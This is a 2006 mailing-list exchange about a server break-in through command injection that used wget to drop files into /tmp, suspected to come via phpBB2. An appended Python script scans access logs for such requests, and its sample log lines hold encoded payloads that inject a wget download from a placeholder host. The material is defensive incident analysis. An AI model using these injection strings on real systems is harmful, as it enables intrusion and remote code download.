On Wed, Jan 04, 2006 at 04:07:21PM +0000, Gaby vanhegan wrote:
> On 4 Jan 2006, at 15:51, Pete Vickers wrote:
> > Is there some attack vector like php or such available on the
> > machine? Maybe they used that to retrieve & write the file?
>
> The messages in the log file indicate that they used some command
> injection in a script to call wget and download the files into /tmp.
> I'm fairly sure it was via a bad script, and I'm trying to locate
> which script was used, so far with no success.

There was a phpBB2 in one of the paths used. If you have phpBB enabled
somewhere, that's a likely attack vector.

Joachim
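
One way to narrow down which script was used, as an added example that is not part of the original thread: decode each request in the web server access log and count, per script path, the requests that name a download tool together with /tmp. It assumes an Apache-style access log and an injection carried in the request line; the log lines and the script name /cgi-bin/example.cgi are constructed.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Request field of an Apache common/combined log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Download tools worth flagging (assumed list; extend for your environment).
DOWNLOADER_RE = re.compile(r'\b(wget|curl|fetch|lwp-download)\b', re.I)

# Constructed sample lines; addresses and hosts are documentation/reserved values.
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Jan/2006:03:12:01 +0000] "GET /index.html HTTP/1.1" 200 5120',
    '198.51.100.7 - - [04/Jan/2006:03:14:22 +0000] "GET /cgi-bin/example.cgi'
    '?file=x%3Bwget%20http%3A%2F%2Fexample.invalid%2Fa%20-O%20%2Ftmp%2Fa HTTP/1.0" 200 312',
    # Same idea, double URL-encoded to slip past a naive grep for "wget".
    '198.51.100.7 - - [04/Jan/2006:03:14:40 +0000] "GET /cgi-bin/example.cgi'
    '?file=x%253Bwget%2520-P%2520%252Ftmp%2520http%253A%252F%252Fexample.invalid%252Fb'
    ' HTTP/1.0" 200 312',
    # Mentions wget but never /tmp: must not be flagged.
    '192.0.2.44 - - [04/Jan/2006:03:20:05 +0000] "GET /docs/wget-howto.html HTTP/1.1" 200 901',
]

def decode(target):
    """Undo up to two layers of URL encoding so encoded payloads become readable."""
    for _ in range(2):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return target

def suspicious_scripts(lines):
    """Count flagged requests per script path (the part before '?')."""
    hits = Counter()
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        raw = match.group(1)
        target = decode(raw)
        if DOWNLOADER_RE.search(target) and "/tmp" in target:
            hits[raw.split("?", 1)[0]] += 1
    return hits

if __name__ == "__main__":
    for script, count in suspicious_scripts(SAMPLE_LOG).most_common():
        print(f"{count:5d}  {script}")
```

POST bodies are not recorded in a standard access log, so an injection delivered that way will not appear in this output.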